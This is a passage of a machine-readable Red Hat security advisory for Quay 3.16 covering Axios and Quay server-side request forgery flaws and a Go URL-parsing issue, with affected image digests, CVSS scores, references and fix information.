            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
    },
    {
      "cve": "CVE-2025-62718",
      "cwe": {
        "id": "CWE-1289",
        "name": "Improper Validation of Unsafe Equivalence in Input"
      },
      "discovery_date": "2026-04-09T15:01:48.111177+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456913"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw has limited impact due to combination of non-default conditions to exploit: the attacker must be able to control or influence URLs passed to axios in a server-side context, the application must have both `HTTP_PROXY` and `NO_PROXY` configured, and the proxy itself must be positioned to act on the misdirected traffic or have been compromised by the attacker to intercept the rerouted traffic.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456913",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456913"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-62718",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1",
          "url": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2",
          "url": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df",
          "url": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/pull/10661",
          "url": "https://github.com/axios/axios/pull/10661"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"
        }
      ],
      "release_date": "2026-04-09T14:31:46.067000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-2377",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-02-11T21:02:44.495000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2439201"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay and mirror registry for Red Hat OpenShift. The log export feature in these products allows an authenticated user to specify an arbitrary callback URL. A backend process then makes server-side HTTP requests to this provided URL. This vulnerability, known as Server-Side Request Forgery (SSRF), could allow an attacker to send requests from the application\u0027s internal network, potentially leading to the disclosure of sensitive information.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Due to the intended and supported use case of Openshift Mirror Registry, deployment in an offline or network-isolated environment, the impact for this product has been downgraded to `Moderate`.\n\nEven in case of compromise, the blast radius is restricted to mirror-registry. It can not be escalated outside the core product. This vulnerability has been scored based on the lack of change of scope.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
